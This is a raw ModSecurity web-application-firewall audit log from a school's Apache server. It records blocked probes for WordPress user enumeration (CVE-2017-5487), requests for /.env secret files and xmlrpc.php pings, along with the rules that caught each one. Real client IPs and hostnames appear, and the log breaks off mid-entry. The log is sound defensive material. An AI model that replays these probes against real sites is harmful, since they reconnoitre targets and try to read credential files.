[msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747107282663008 1928 (- - -) Stopwatch2: 1747107282663008 1928; combined=999, p1=327, p2=636, p3=0, p4=0, p5=36, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --230b2b1b-Z-- --3260682a-A-- [13/May/2025:10:37:56 +0700] aCK-lI3mg5f2L4Eof6PVHQAAANQ 103.236.140.4 34878 103.236.140.4 8181 --3260682a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.212.135.126 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.212.135.126 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3260682a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3260682a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747107476946274 2779 (- - -) Stopwatch2: 1747107476946274 2779; combined=1126, p1=354, p2=747, p3=0, p4=0, p5=25, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3260682a-Z-- --4aff6a1f-A-- [13/May/2025:10:45:43 +0700] aCLAZ4_RcapTWo3LoyddCAAAAEQ 103.236.140.4 60544 103.236.140.4 8181 --4aff6a1f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 139.5.71.123 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 139.5.71.123 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4aff6a1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4aff6a1f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747107943265380 1819 (- - -) Stopwatch2: 1747107943265380 1819; combined=988, p1=271, p2=698, p3=0, p4=0, p5=19, sr=47, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4aff6a1f-Z-- --f0795b16-A-- [13/May/2025:11:06:32 +0700] aCLFSI3mg5f2L4Eof6PssQAAAMQ 103.236.140.4 40556 103.236.140.4 8181 --f0795b16-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://smkn22-jkt.sch.id Host: smkn22-jkt.sch.id X-Real-IP: 154.86.112.224 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.86.112.224 X-Forwarded-Proto: https Connection: close Origin: https://smkn22-jkt.sch.id User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --f0795b16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f0795b16-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747109192068242 2682 (- - -) Stopwatch2: 1747109192068242 2682; combined=1369, p1=409, p2=938, p3=0, p4=0, p5=22, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0795b16-Z-- --31f10554-A-- [13/May/2025:11:53:04 +0700] aCLQMI_RcapTWo3LoyeIdAAAAFQ 103.236.140.4 55692 103.236.140.4 8181 --31f10554-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 143.110.147.123 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 143.110.147.123 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --31f10554-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --31f10554-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747111984013146 799 (- - -) Stopwatch2: 1747111984013146 799; combined=328, p1=289, p2=0, p3=0, p4=0, p5=38, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --31f10554-Z-- --dab26934-A-- [13/May/2025:12:25:54 +0700] aCLX4o_RcapTWo3LoyeIjgAAAEQ 103.236.140.4 55986 103.236.140.4 8181 --dab26934-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.164.30.207 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.164.30.207 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --dab26934-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dab26934-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747113954310272 2721 (- - -) Stopwatch2: 1747113954310272 2721; combined=1228, p1=413, p2=785, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dab26934-Z-- --04fe411c-A-- [13/May/2025:12:26:47 +0700] aCLYF-O55leZpQyxFsY_GAAAAII 103.236.140.4 55992 103.236.140.4 8181 --04fe411c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.47 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.47 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --04fe411c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04fe411c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747114007753366 2888 (- - -) Stopwatch2: 1747114007753366 2888; combined=1262, p1=456, p2=775, p3=0, p4=0, p5=31, sr=109, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04fe411c-Z-- --2dd5e946-A-- [13/May/2025:12:26:51 +0700] aCLYG43mg5f2L4Eof6METQAAAMw 103.236.140.4 55996 103.236.140.4 8181 --2dd5e946-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.47 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.47 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2dd5e946-C-- demo.sayHello --2dd5e946-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2dd5e946-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747114011509084 5104 (- - -) Stopwatch2: 1747114011509084 5104; combined=3862, p1=487, p2=3169, p3=22, p4=24, p5=93, sr=69, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2dd5e946-Z-- --09bfb169-A-- [13/May/2025:12:27:02 +0700] aCLYJo3mg5f2L4Eof6METgAAANA 103.236.140.4 56000 103.236.140.4 8181 --09bfb169-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 193.207.56.130 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 193.207.56.130 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --09bfb169-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --09bfb169-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747114022951807 3049 (- - -) Stopwatch2: 1747114022951807 3049; combined=1334, p1=481, p2=824, p3=0, p4=0, p5=29, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --09bfb169-Z-- --08c11804-A-- [13/May/2025:12:33:32 +0700] aCLZrI_RcapTWo3LoyeIlQAAAFE 103.236.140.4 56024 103.236.140.4 8181 --08c11804-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.202.78.67 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.78.67 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --08c11804-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --08c11804-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747114412249937 2815 (- - -) Stopwatch2: 1747114412249937 2815; combined=1245, p1=438, p2=777, p3=0, p4=0, p5=30, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --08c11804-Z-- --9494937f-A-- [13/May/2025:12:33:35 +0700] aCLZr4_RcapTWo3LoyeIlwAAAFU 103.236.140.4 56028 103.236.140.4 8181 --9494937f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.202.78.67 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.202.78.67 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9494937f-C-- demo.sayHello --9494937f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9494937f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747114415201361 5299 (- - -) Stopwatch2: 1747114415201361 5299; combined=3968, p1=444, p2=3285, p3=29, p4=33, p5=102, sr=67, sw=75, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9494937f-Z-- --c283d47a-A-- [13/May/2025:12:38:08 +0700] aCLawI3mg5f2L4Eof6MEUwAAAMA 103.236.140.4 56052 103.236.140.4 8181 --c283d47a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.43 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.43 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c283d47a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c283d47a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747114688448121 2760 (- - -) Stopwatch2: 1747114688448121 2760; combined=1237, p1=432, p2=775, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c283d47a-Z-- --424e3915-A-- [13/May/2025:12:38:11 +0700] aCLaw4_RcapTWo3LoyeIngAAAEQ 103.236.140.4 56056 103.236.140.4 8181 --424e3915-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.43 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.43 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --424e3915-C-- demo.sayHello --424e3915-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --424e3915-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747114691233680 4840 (- - -) Stopwatch2: 1747114691233680 4840; combined=3856, p1=431, p2=3197, p3=28, p4=32, p5=97, sr=68, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --424e3915-Z-- --562ee276-A-- [13/May/2025:12:42:48 +0700] aCLb2I_RcapTWo3LoyeIowAAAFI 103.236.140.4 56080 103.236.140.4 8181 --562ee276-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.235.17.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.235.17.238 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --562ee276-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --562ee276-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747114968318733 3238 (- - -) Stopwatch2: 1747114968318733 3238; combined=1391, p1=488, p2=868, p3=0, p4=0, p5=35, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --562ee276-Z-- --e95e533a-A-- [13/May/2025:13:01:47 +0700] aCLgS4_RcapTWo3LoyeI5AAAAEA 103.236.140.4 56684 103.236.140.4 8181 --e95e533a-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 159.203.57.61 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0 Accept: */* Cookie: X-Forwarded-For: 159.203.57.61 Accept-Encoding: gzip X-Varnish: 147145588 --e95e533a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e95e533a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747116107353547 752 (- - -) Stopwatch2: 1747116107353547 752; combined=315, p1=232, p2=0, p3=0, p4=0, p5=83, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e95e533a-Z-- --93433d23-A-- [13/May/2025:13:22:59 +0700] aCLlQ4_RcapTWo3LoyeI-gAAAE4 103.236.140.4 56930 103.236.140.4 8181 --93433d23-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.101 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 6.0; zh-CN; KNT-UL10 Build/HUAWEIKNT-UL10) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.108 Quark/3.0.2.943 Mobile Safari/537.36 Accept-Charset: utf-8 --93433d23-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --93433d23-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747117379912059 991 (- - -) Stopwatch2: 1747117379912059 991; combined=423, p1=356, p2=0, p3=0, p4=0, p5=67, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93433d23-Z-- --ff2d9101-A-- [13/May/2025:13:23:47 +0700] aCLlc4_RcapTWo3LoyeI-wAAAFU 103.236.140.4 56932 103.236.140.4 8181 --ff2d9101-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.101 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0) Accept-Charset: utf-8 --ff2d9101-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ff2d9101-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747117427181369 850 (- - -) Stopwatch2: 1747117427181369 850; combined=348, p1=305, p2=0, p3=0, p4=0, p5=43, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ff2d9101-Z-- --c5e44272-A-- [13/May/2025:13:24:29 +0700] aCLlnY_RcapTWo3LoyeI_QAAAFQ 103.236.140.4 56936 103.236.140.4 8181 --c5e44272-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.101 X-Forwarded-Proto: https Connection: close User-Agent: Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1 Accept-Charset: utf-8 --c5e44272-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5e44272-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747117469513580 987 (- - -) Stopwatch2: 1747117469513580 987; combined=374, p1=330, p2=0, p3=0, p4=0, p5=44, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5e44272-Z-- --ae4ea233-A-- [13/May/2025:13:25:00 +0700] aCLlvI3mg5f2L4Eof6MEyAAAAMQ 103.236.140.4 56938 103.236.140.4 8181 --ae4ea233-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.101 X-Forwarded-Host: 103.236.140.4 